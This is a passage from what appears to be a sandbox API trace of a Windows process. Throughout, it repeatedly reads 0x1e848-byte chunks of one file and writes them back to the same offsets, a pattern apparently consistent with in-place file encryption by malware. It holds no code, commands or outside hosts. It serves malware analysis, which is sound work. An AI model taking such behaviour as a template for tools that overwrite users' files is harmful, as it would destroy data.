lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.827] GetProcessHeap () returned 0x500000 [0127.827] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.827] GetProcessHeap () returned 0x500000 [0127.827] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.827] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x92dda80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.827] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.886] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x92dda80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.886] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.887] GetProcessHeap () returned 0x500000 [0127.887] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.887] GetProcessHeap () returned 0x500000 [0127.887] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.887] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x931ab10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.887] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.920] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x931ab10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.920] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.921] GetProcessHeap () returned 0x500000 [0127.921] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.921] GetProcessHeap () returned 0x500000 [0127.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.921] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9357ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.921] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.929] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9357ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.929] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.930] GetProcessHeap () returned 0x500000 [0127.930] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.930] GetProcessHeap () returned 0x500000 [0127.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.930] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9394c30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.930] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0127.969] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9394c30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.969] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0127.970] GetProcessHeap () returned 0x500000 [0127.970] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0127.970] GetProcessHeap () returned 0x500000 [0127.970] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0127.970] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x93d1cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.970] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.049] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x93d1cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.049] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.049] GetProcessHeap () returned 0x500000 [0128.049] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.049] GetProcessHeap () returned 0x500000 [0128.049] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.050] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x940ed50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.050] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.378] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x940ed50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.378] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.378] GetProcessHeap () returned 0x500000 [0128.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.379] GetProcessHeap () returned 0x500000 [0128.379] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.379] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x944bde0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.379] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.570] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x944bde0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.570] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.570] GetProcessHeap () returned 0x500000 [0128.570] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.570] GetProcessHeap () returned 0x500000 [0128.570] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.570] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9488e70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.571] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.606] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9488e70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.606] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.607] GetProcessHeap () returned 0x500000 [0128.607] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.607] GetProcessHeap () returned 0x500000 [0128.607] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.607] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x94c5f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.607] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.664] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x94c5f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.664] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.665] GetProcessHeap () returned 0x500000 [0128.665] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.665] GetProcessHeap () returned 0x500000 [0128.665] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.665] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9502f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.665] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.853] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9502f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.853] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.853] GetProcessHeap () returned 0x500000 [0128.853] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.854] GetProcessHeap () returned 0x500000 [0128.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.854] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9540020, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.854] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.923] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9540020, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.923] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.924] GetProcessHeap () returned 0x500000 [0128.924] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.924] GetProcessHeap () returned 0x500000 [0128.924] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.924] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x957d0b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.924] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.945] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x957d0b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.946] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.946] GetProcessHeap () returned 0x500000 [0128.946] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.948] GetProcessHeap () returned 0x500000 [0128.948] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.948] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x95ba140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.948] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.957] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x95ba140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.957] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.958] GetProcessHeap () returned 0x500000 [0128.958] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.958] GetProcessHeap () returned 0x500000 [0128.958] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.958] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x95f71d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0128.977] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x95f71d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.977] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0128.977] GetProcessHeap () returned 0x500000 [0128.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0128.977] GetProcessHeap () returned 0x500000 [0128.977] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0128.977] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9634260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.014] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9634260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.014] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.015] GetProcessHeap () returned 0x500000 [0129.015] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.015] GetProcessHeap () returned 0x500000 [0129.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.015] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x96712f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.015] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.040] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x96712f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.040] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.040] GetProcessHeap () returned 0x500000 [0129.040] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.040] GetProcessHeap () returned 0x500000 [0129.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.041] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x96ae380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.041] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.050] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x96ae380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.050] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.050] GetProcessHeap () returned 0x500000 [0129.050] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.050] GetProcessHeap () returned 0x500000 [0129.050] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.050] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x96eb410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.050] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.070] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x96eb410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.070] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.071] GetProcessHeap () returned 0x500000 [0129.071] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.071] GetProcessHeap () returned 0x500000 [0129.071] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.072] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x97284a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.072] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.080] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x97284a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.081] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.081] GetProcessHeap () returned 0x500000 [0129.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.081] GetProcessHeap () returned 0x500000 [0129.081] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.081] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9765530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.081] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.090] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9765530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.091] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.091] GetProcessHeap () returned 0x500000 [0129.091] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.091] GetProcessHeap () returned 0x500000 [0129.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.091] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x97a25c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.091] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.100] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x97a25c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.100] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.101] GetProcessHeap () returned 0x500000 [0129.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.101] GetProcessHeap () returned 0x500000 [0129.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.101] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x97df650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.101] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.111] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x97df650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.111] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.112] GetProcessHeap () returned 0x500000 [0129.112] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.112] GetProcessHeap () returned 0x500000 [0129.112] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.112] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x981c6e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.112] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.131] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x981c6e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.132] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, 